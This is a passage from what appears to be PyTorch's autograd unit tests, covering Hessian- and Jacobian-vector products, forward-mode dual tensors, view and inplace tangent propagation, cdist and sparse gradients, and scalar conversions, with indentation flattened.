with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.vhp(foo, inp, v, strict=True)
res = autogradF.vhp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.vhp(bar, inp, v, strict=True)
res = autogradF.vhp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.vhp(bar2, inp, v, strict=True)
res = autogradF.vhp(bar2, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
def test_vhp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vhp_output(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.vhp(foo, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3), torch.rand(4))
v = (torch.ones(3), torch.ones(4))
out, vhp_val = autogradF.vhp(bar, inputs, v)
self._assert_same_struct(vhp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(vhp_val[0].grad_fn)
self.assertIsNone(vhp_val[1].grad_fn)
def test_vhp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.vhp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
inputs = torch.rand([])
v = torch.rand([])
res = autogradF.vhp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
res = autogradF.vhp(reducer, inputs)
self._assert_same_struct(res[1], inputs)
def bad_reducer(x):
return x.sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
v = torch.rand(4, 4)
res = autogradF.vhp(bad_reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
def test_vhp_create_graph(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.vhp(foo, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
torch.rand(4, dtype=torch.double, requires_grad=True))
v = (torch.ones(3, dtype=torch.double, requires_grad=True),
torch.ones(4, dtype=torch.double, requires_grad=True))
out, vhp_val = autogradF.vhp(bar, inputs, v, create_graph=True)
self._assert_same_struct(vhp_val, inputs)
self.assertIsNotNone(out.grad_fn)
self.assertIsNotNone(vhp_val[0].grad_fn)
self.assertIsNotNone(vhp_val[1].grad_fn)
gradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.vhp(bar, (x, y), v, create_graph=True)
return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_hvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
v = torch.rand(4)
res = autogradF.hvp(foo, inp, v)
with self.assertRaisesRegex(TypeError, "The inputs given to hvp must be either a Tensor"):
res = autogradF.hvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hvp must"):
res = autogradF.hvp(bar, inp, v)
err_msg_out = "The Tensor returned by the function given to hvp should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.hvp(bar2, inp, v)
with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
res = autogradF.hvp(foo, inp, torch.rand(5))
with self.assertRaisesRegex(TypeError, "The v given to hvp must be either a Tensor or a tuple of Tensors"):
res = autogradF.hvp(foo, inp, (v, 2))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
v = (torch.rand(4), torch.rand(5))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def test_hvp_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A linear function for which the Jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.hvp(foo, inp, v, strict=True)
res = autogradF.hvp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.hvp(bar, inp, v, strict=True)
res = autogradF.hvp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.hvp(bar2, inp, v, strict=True)
res = autogradF.hvp(bar2, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
def test_hvp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_hvp_output(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.hvp(foo, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3), torch.rand(4))
v = (torch.ones(3), torch.ones(4))
out, hvp_val = autogradF.hvp(bar, inputs, v)
self._assert_same_struct(hvp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(hvp_val[0].grad_fn)
self.assertIsNone(hvp_val[1].grad_fn)
def test_hvp_scalar(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.hvp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
inputs = torch.rand([])
v = torch.rand([])
res = autogradF.hvp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
res = autogradF.hvp(reducer, inputs)
self._assert_same_struct(res[1], inputs)
def bad_reducer(x):
return x.exp().sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
v = torch.rand(4, 4)
res = autogradF.hvp(bad_reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
def test_hvp_create_graph(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.hvp(foo, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
torch.rand(4, dtype=torch.double, requires_grad=True))
v = (torch.ones(3, dtype=torch.double, requires_grad=True),
torch.ones(4, dtype=torch.double, requires_grad=True))
out, hvp_val = autogradF.hvp(bar, inputs, v, create_graph=True)
self._assert_same_struct(hvp_val, inputs)
self.assertIsNotNone(out.grad_fn)
self.assertIsNotNone(hvp_val[0].grad_fn)
self.assertIsNotNone(hvp_val[1].grad_fn)
gradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.hvp(bar, (x, y), v, create_graph=True)
return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_jacobian_match_vjp_jvp(self):
def foo(x):
return x ** 3 + x.sum()
inputs = torch.rand(4)
v = torch.rand(4)
jac = autogradF.jacobian(foo, inputs)
jvp = autogradF.jvp(foo, inputs, v)[1]
vjp = autogradF.vjp(foo, inputs, v)[1]
self.assertEqual(jvp, torch.mm(jac, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vjp, torch.mm(v.unsqueeze(0), jac).squeeze(0))
def test_hessian_match_vhp_hvp(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4)
v = torch.rand(4)
hes = autogradF.hessian(foo, inputs)
hvp = autogradF.hvp(foo, inputs, v)[1]
vhp = autogradF.vhp(foo, inputs, v)[1]
self.assertEqual(hvp, torch.mm(hes, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vhp, torch.mm(v.unsqueeze(0), hes).squeeze(0))
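# Illustrative sketch (added for clarity; a hypothetical helper, not part of the original
# suite). The two tests above encode the defining identities jvp(f, x, v) = J(x) @ v,
# vjp(f, x, v) = v @ J(x), hvp(f, x, v) = H(x) @ v and vhp(f, x, v) = v @ H(x);
# the same check on an elementwise function, whose Jacobian is diagonal:
def _jacobian_identity_sketch(self):
    def f(x):
        return x.exp()
    x = torch.rand(3)
    v = torch.rand(3)
    jac = autogradF.jacobian(f, x)
    self.assertEqual(autogradF.jvp(f, x, v)[1], jac @ v)  # J v
    self.assertEqual(autogradF.vjp(f, x, v)[1], v @ jac)  # v^T J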
class TestAutogradForwardMode(TestCase):
def tearDown(self):
# Ensure that a failing test won't make others fail
while fwAD._current_level >= 0:
fwAD.exit_dual_level()
super().tearDown()
def test_forward_level_cleanup(self):
def get_tensor_and_weak_ref():
# Create a new Tensor and weak reference
t = torch.rand(2, requires_grad=True)
return t, torch._C._WeakTensorRef(t)
# Sanity check that the helper function works as expected
t, t_ref = get_tensor_and_weak_ref()
self.assertFalse(t_ref.expired())
del t
self.assertTrue(t_ref.expired())
# Main test code
foo = torch.rand(2)
with fwAD.dual_level():
tangent, tangent_ref = get_tensor_and_weak_ref()
self.assertFalse(tangent_ref.expired())
dual = fwAD.make_dual(foo, tangent)
self.assertFalse(tangent_ref.expired())
# Make sure that the tangent we provided has been re-used as is
self.assertTrue(fwAD.unpack_dual(dual)[1] is tangent)
# Make sure that dual is keeping the tangent alive
del tangent
self.assertFalse(tangent_ref.expired())
# Make sure that the dual level does not keep the C++
# version of the tangent alive
del dual
self.assertTrue(tangent_ref.expired())
def test_size_check(self):
foo = torch.rand(2)
tangent = torch.rand(3)
with fwAD.dual_level():
with self.assertRaisesRegex(RuntimeError, "Trying to set a forward gradient that has a different size"):
dual = fwAD.make_dual(foo, tangent)
dual = fwAD.make_dual(foo, tangent[1:])
# The tests below are intended to ensure all of the following behaviors:
# - Ensure that the default level system in the Python binding works
# - Ensure that only level 0 exists and nesting is properly disabled
# - Ensure that printing works fine
# - Ensure that basic packing/unpacking works
# - Ensure that advanced packing/unpacking works
# - For memory / version counter sharing
# - For backward AD (regular ops)
# - Ensure that view + inplace for both modes work fine
# - Ensure we do proper cleanup on exit of a level
# A minimal usage sketch of the dual-number API follows this list.
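# Illustrative usage sketch (added for clarity; not one of the original tests, and it
# relies on the same module-level `torch` and `fwAD` imports as the tests around it).
# Inside a dual level, make_dual attaches a tangent to a primal and unpack_dual reads
# the propagated tangent back out of any result.
def _dual_number_usage_sketch(self):
    primal = torch.rand(2)
    tangent = torch.rand(2)
    with fwAD.dual_level():
        dual = fwAD.make_dual(primal, tangent)
        out = dual * 3  # forward AD propagates the tangent: d(out) = 3 * tangent
        p, t = fwAD.unpack_dual(out)
        self.assertEqual(p, primal * 3)
        self.assertEqual(t, tangent * 3)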
def test_default_level(self):
foo = torch.rand(2)
bar = torch.rand(2)
with fwAD.dual_level():
baz = fwAD.make_dual(foo, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
# We don't actually need to enforce that these two are the exact same Python
# object; feel free to relax this in the future
self.assertIs(baz_tangent, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
self.assertEqual(baz_tangent, None)
def test_nested_level(self):
with fwAD.dual_level() as level:
# For now only level 0 exists
self.assertEqual(level, 0)
with fwAD.dual_level():
with self.assertRaisesRegex(RuntimeError, "Nested forward mode AD is not supported at the moment"):
nest_level = fwAD.enter_dual_level()
def test_print(self):
with fwAD.dual_level() as level:
a = torch.rand(3)
self.assertFalse("tangent=" in str(a))
b = fwAD.make_dual(a, torch.rand(3))
self.assertFalse("tangent=" in str(a))
self.assertTrue("tangent=" in str(b))
b_primal, b_tangent = fwAD.unpack_dual(b)
self.assertFalse("tangent=" in str(b_primal))
self.assertFalse("tangent=" in str(b_tangent))
def test_basic_packing_unpacking(self):
foo = torch.rand(2)
bar = torch.rand(2)
with fwAD.dual_level():
baz = fwAD.make_dual(foo, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
self.assertIs(baz_tangent, bar)
# Check that packing/unpacking did not change the input
foo_primal, foo_tangent = fwAD.unpack_dual(foo)
self.assertEqual(foo_primal, foo)
self.assertIsNone(foo_tangent)
def test_advanced_packing_unpacking(self):
foo = torch.rand(2)
bar = torch.ones(2)
# Memory and version counter check
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
# Ensure that they are sharing memory and version counter
self.assertEqual(dual.storage().data_ptr(), foo.storage().data_ptr())
# Ensure we properly share the version counter
self.assertEqual(foo._version, dual._version)
foo.add_(1)
self.assertEqual(foo._version, dual._version)
# Unpacking should only create aliases as well
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
self.assertEqual(dual_primal.storage().data_ptr(), foo.storage().data_ptr())
self.assertEqual(dual_tangent.storage().data_ptr(), bar.storage().data_ptr())
# And the tangent is actually re-used as-is so it is still the same Tensor
self.assertIs(dual_tangent, bar)
# Ensure we properly share the version counter
self.assertEqual(foo._version, dual_primal._version)
foo.add_(1)
self.assertEqual(foo._version, dual_primal._version)
self.assertEqual(bar._version, dual_tangent._version)
bar.add_(1)
self.assertEqual(bar._version, dual_tangent._version)
# backward mode check
with fwAD.dual_level():
foo.requires_grad_()
bar.requires_grad_()
# Check that backward gradients properly propagate through packing/unpacking
dual = fwAD.make_dual(foo, bar)
p, t = fwAD.unpack_dual(dual)
gfoo, gbar = torch.autograd.grad(p.sum(), (foo, bar), retain_graph=True, allow_unused=True)
self.assertEqual(gfoo, torch.ones_like(foo))
self.assertIsNone(gbar)
gfoo, gbar = torch.autograd.grad(t.sum(), (foo, bar), retain_graph=True, allow_unused=True)
self.assertIsNone(gfoo)
self.assertEqual(gbar, torch.ones_like(bar))
# Check that forward gradients are impacted by detach()
detached_dual = dual.detach()
out = detached_dual * 2
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertEqual(p, foo * 2)
self.assertIsNone(t)
# Check that forward gradients are not impacted by no_grad
with torch.no_grad():
out = dual * 3
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertFalse(t.requires_grad)
self.assertEqual(p, foo * 3)
self.assertEqual(t, bar * 3)
# Check that forward gradients are not impacted by inplace detach
dual = dual.clone()
dual.detach_()
out = dual * 2
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertEqual(p, foo * 2)
self.assertIsNone(t)
def test_view_inplace_non_differentiable_views(self):
original_foo = torch.rand(2, dtype=torch.double)
original_bar = torch.ones(2, dtype=torch.double)
# Do clones to be able to compare the values updated inplace
# with the original content of these Tensors
foo = original_foo.clone()
bar = original_bar.clone()
with fwAD.dual_level():
# Note that in this test, we use "update" to mean computing the right tangent for the dual.
# All the inplace operations here are expected to update the primal value of the Tensors, but
# not always their tangents.
# Also, all mentions of "non differentiable view" here mean non forward differentiable view,
# unless specified otherwise.
# See note [Forward Grad View/inplace] for more details on how these views work.
# Check that inplace ops do not update non-differentiable views
# Non differentiable view
dual = fwAD.make_dual(foo, bar)
dual *= 2
# Check that non differentiable view's tangent was not updated
self.assertIsNone(fwAD.unpack_dual(foo)[1])
# Check that the computed result is correct
self.assertEqual(bar, original_bar * 2)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
self.assertEqual(foo, original_foo * 2)
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 2)
# Other non differentiable view
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
self.assertIsNone(fwAD.unpack_dual(dual_primal)[1])
self.assertIsNone(fwAD.unpack_dual(dual_tangent)[1])
dual_primal *= 2
# Ensure dual's tangent did not change
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
dual_tangent *= 2
# Ensure dual's primal did not change
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 4)
def test_view_inplace_differentiable_views(self):
original_foo = torch.rand(2)
original_bar = torch.ones(2)
# Do clones to be able to compare the values updated inplace
# with the original content of these Tensors
foo = original_foo.clone()
bar = original_bar.clone()
with fwAD.dual_level():
# Check that inplace ops update differentiable views but stop at non differentiable ones
# A non differentiable view
dual = fwAD.make_dual(foo, bar)
# A differentiable view
view = dual.narrow(0, 0, 1)
view *= 2
# Check that non differentiable view was not updated
self.assertIsNone(fwAD.unpack_dual(foo)[1])
# Check that differentiable view was updated
self.assertEqual(fwAD.unpack_dual(dual)[1], torch.tensor([2., 1.]))
self.assertEqual(fwAD.unpack_dual(view)[1], torch.tensor([2.]))
# Check that we track differentiable view even for Tensors that are not dual
baz = torch.rand(2)
baz += dual
self.assertEqual(fwAD.unpack_dual(baz)[1], fwAD.unpack_dual(dual)[1])
# Updates made through a view should propagate the tangent as well
baz = torch.rand(2)
baz[0] = dual[0]
self.assertEqual(fwAD.unpack_dual(baz)[1][0], fwAD.unpack_dual(dual)[1][0])
# Unused values get a gradient of 0
self.assertEqual(fwAD.unpack_dual(baz)[1][1], 0.)
# Check that forward non-differentiable views do prevent gradient update
baz = torch.rand(2)
view = baz.detach()
view += dual
self.assertIsNone(fwAD.unpack_dual(baz)[1])
def test_grad_cleanup(self):
foo = torch.rand(2)
bar = torch.rand(2)
baz = torch.rand(2)
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
self.assertIsNone(fwAD.unpack_dual(foo)[1])
self.assertIs(fwAD.unpack_dual(dual)[1], bar)
self.assertIsNone(fwAD.unpack_dual(dual)[1])
with fwAD.dual_level():
self.assertIsNone(fwAD.unpack_dual(foo)[1])
new_dual = fwAD.make_dual(foo, baz)
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
new_dual_primal, new_dual_tangent = fwAD.unpack_dual(new_dual)
self.assertEqual(dual_primal, new_dual_primal)
self.assertIsNone(dual_tangent)
self.assertEqual(new_dual_tangent, baz)
def test_detach_view_tracking(self):
# Default detach is both forward and backward non-differentiable
foo = torch.rand(2)
foo_weak = torch._C._WeakTensorRef(foo)
out = foo.detach()
del foo
self.assertTrue(foo_weak.expired())
def test_out_variant(self):
with fwAD.dual_level():
foo = fwAD.make_dual(torch.rand(2), torch.rand(2))
bar = torch.rand(2)
with self.assertRaisesRegex(RuntimeError, "out= function"):
torch.add(bar, bar, out=foo)
with self.assertRaisesRegex(RuntimeError, "out= function"):
torch.add(foo, bar, out=bar)
# Generic device type autograd tests.
class TestAutogradDeviceType(TestCase):
def test_min_max_median_backprops_to_all_values(self, device):
for f in [torch.min, torch.max, torch.median, torch.nanmedian]:
x1 = torch.tensor([1., 0., 1., 0., 1., 0.], device=device, requires_grad=True)
x2 = torch.tensor([float('nan'), float('nan'), float('nan')], requires_grad=True)
for x in [x1, x2]:
y = f(x)
y.backward()
self.assertEqual(x.grad.sum(), 1.)
self.assertEqual((x.grad == 1 / 3).sum(), 3)
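# Illustrative sketch (added for clarity; a hypothetical helper, not part of the original
# suite). As the assertions above encode, when a reduction has tied extrema the unit
# incoming gradient is split evenly across all tied entries:
def _tied_extrema_grad_sketch(self, device):
    x = torch.tensor([1., 0., 1., 0., 1., 0.], device=device, requires_grad=True)
    torch.max(x).backward()
    self.assertEqual(x.grad.sum(), 1.)            # total gradient mass is preserved
    self.assertEqual((x.grad == 1 / 3).sum(), 3)  # each of the three tied maxima gets 1/3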
def test_cdist(self, device):
def _test_euclidean_large_cdist(sizex, sizey=None):
if sizey is None:
sizey = sizex
x = torch.randn(sizex, device=device, dtype=torch.float)
y = torch.randn(sizey, device=device, dtype=torch.float)
eps = 1e-6
# perturb x away from y to avoid the extremum, where the gradient is ill-defined
x = x - (((x - y) < eps).float() * 2 * eps)
x.requires_grad = True
y.requires_grad = True
dist = torch.cdist(x, y, p=2)
# Do a backward pass to check that it is valid for large
# matrices
loss = dist.sum()
loss.backward()
_test_euclidean_large_cdist((2000, 5))
# Ensure that cdist backward with p<1 does not produce NaNs
def test_cdist_grad_p_lt_1_no_nan(self, device):
for p in [0.99, 0.7, 0.5, 0.1, 0.01]:
x = torch.randn(1, 2, device=device)
y = x.clone().detach() + torch.tensor([[1., 0.]], device=device)
x.requires_grad = True
y.requires_grad = True
result = torch.cdist(x, y, p=p)
result.backward(torch.ones_like(result))
self.assertFalse(torch.isnan(x.grad).any())
self.assertFalse(torch.isnan(y.grad).any())
def test_cdist_same_inputs(self, device):
# Test to detect issues in the cdist gradient calculation
# when the distances are 0
sizex = (1, 27, 32)
for p in [0, 1, 2, 3, 1.5, 2.5, float('inf')]:
x = torch.randn(sizex, device=device, dtype=torch.float)
dist_grad = torch.randn((1, 27, 27), device=device, dtype=torch.float)
y = x.clone()
eps = 1e-6
x.requires_grad = True
d = torch.cdist(x, y)
d.backward(dist_grad)
# Check that the backward pass does not contain invalid
# values such as nan or inf
assert torch.isfinite(x.grad).all()
def test_parameter_resize(self, device):
asd = torch.nn.Parameter(torch.ones(16, dtype=torch.double, device=device))
for i in range(2):
with torch.no_grad():
asd.set_(asd[1:])
asd.grad = None
m = torch.cat((asd, asd))
m.sum().backward()
@dtypes(torch.double, torch.cdouble)
def test_sparse_ctor_getter_backward(self, device, dtype):
# See NOTE [ Sparse: autograd and API ] on the expected behavior of this test
def _test(size, sparse_dim, nnz, device):
v_size = [nnz] + list(size[sparse_dim:])
i = torch.rand(sparse_dim, nnz)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
inp = torch.randn(v_size, dtype=torch.double, device=device, requires_grad=True)
other = self.genSparseTensor(size, sparse_dim, nnz, is_uncoalesced=True, device=device,
dtype=dtype)[0]
def fn(v):
x = torch.sparse_coo_tensor(i, v, size, dtype=dtype, device=device)
y = (x + other).coalesce()
yv = y.values()
new_v = yv.tanh()
z = torch.sparse_coo_tensor(y.indices(), new_v, y.size())
return z.coalesce().values()
gradcheck(fn, (inp,), check_batched_grad=False)
# FIXME: make gradgradcheck work.
# gradgradcheck(fn, (inp,), check_batched_grad=False)
# assert that _values is non-differentiable
with self.assertRaisesRegex(RuntimeError, "does not have a grad_fn"):
other.detach().requires_grad_()._values().backward(torch.ones_like(other._values()))
for empty_i, empty_v, empty_nnz in product([True, False], repeat=3):
sparse_size = [] if empty_i else [2, 1]
dense_size = [1, 0, 2] if empty_v else [1, 2]
nnz = 0 if empty_nnz else 5
_test(sparse_size + dense_size, len(sparse_size), nnz, device)
@dtypes(torch.double, torch.cdouble)
def test_sparse_backward(self, device, dtype):
class FixedGradientFunction(Function):
@staticmethod
def forward(ctx, x, grad_x):
ctx.save_for_backward(grad_x)
return x
@staticmethod
def backward(ctx, grad_x):
saved_grad_x, = ctx.saved_tensors
return saved_grad_x, None
size = torch.Size([6, 3, 2])
i1 = torch.tensor([
[0, 3, 4],
[0, 2, 2],
], dtype=torch.long)
v1 = make_tensor([3, 2], dtype=dtype, device=device)
sparse_grad1 = torch.sparse_coo_tensor(i1, v1, size, dtype=dtype, device=device)
i2 = torch.tensor([
[0, 1, 3, 4],
[0, 1, 2, 2],
], dtype=torch.long)
v2 = make_tensor([4, 2], dtype=dtype, device=device)
sparse_grad2 = torch.sparse_coo_tensor(i2, v2, size, dtype=dtype, device=device)
dense_grad = torch.rand(size, device=device, dtype=dtype)
fn = FixedGradientFunction
# sparse first
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, sparse_grad1) + fn.apply(x, dense_grad) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
# dense first
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, dense_grad) + fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
# sparse only
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, sparse_grad1 + sparse_grad2)
# autograd tests via common_method_invocations don't allow input tensors to
# be sparse (RuntimeError: gradcheck expects all tensor inputs are dense when
# check_sparse_nnz is set to False.)
def test_sparse_mask_autograd(self, device):
tensor = torch.randn(3, requires_grad=True, device=device)
mask = torch.ones(3, device=device)
mask[1] = 0
mask = mask.to_sparse()
converted = tensor.sparse_mask(mask).to_dense()
converted.sum().backward()
self.assertEqual(tensor.grad, mask.to_dense())
def test_pyscalar_conversions(self, device):
def _test_pyscalar_conversions(t, integral_conv):
# integral -> integral
l = t(torch.zeros(1, 1, 1, dtype=torch.long))
pyscalar = -12345
l[0] = pyscalar
self.assertEqual(integral_conv(l), pyscalar)
# floating point -> floating point
f = Variable(t(torch.randn(1, 1, dtype=torch.double)))
pyscalar = -12345.1
f[0] = pyscalar
self.assertEqual(float(f), pyscalar)
f[0] = nan
self.assertTrue(math.isnan(float(f)))
f[0] = inf
self.assertEqual(float(f), inf)
f[0] = -inf
self.assertEqual(float(f), -inf)
# integral -> floating point
# check we can convert something that loses precision
pyscalar = 1234567890123456789
self.assertNotEqual(pyscalar, integral_conv(float(pyscalar)))
l[0] = pyscalar
self.assertEqual(float(l), float(pyscalar))
# floating point -> integral
f[0] = nan
self.assertRaises(ValueError, lambda: integral_conv(f[0]))
f[0] = inf
self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
f[0] = -inf
self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
f[0] = sys.float_info.max
self.assertEqual(integral_conv(f), sys.float_info.max)
# bool, nonzero
def test_nonzero(tensor, value, expected):
tensor[0] = value
self.assertEqual(expected, bool(tensor))
self.assertEqual(expected, True if tensor else False)
test_nonzero(l, 0, False)
test_nonzero(l, -2, True)
test_nonzero(f, 0.0, False)
test_nonzero(f, sys.float_info.min, True)
test_nonzero(f, nan, bool(nan))
test_nonzero(f, inf, bool(inf))
test_nonzero(f, -inf, bool(-inf))
_test_pyscalar_conversions(lambda x: x.to(device), lambda x: int(x))
@dtypesIfCUDA(torch.half, torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
@dtypes(torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
def test_set_requires_grad_only_for_floats(self, device, dtype):
def f1():
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad_()
def f2():
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad = True
def f3():
torch.ones(1, dtype=dtype, device=device, requires_grad=True)
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad = False # should always work
a.requires_grad_(False)
for f in [f1, f2, f3]:
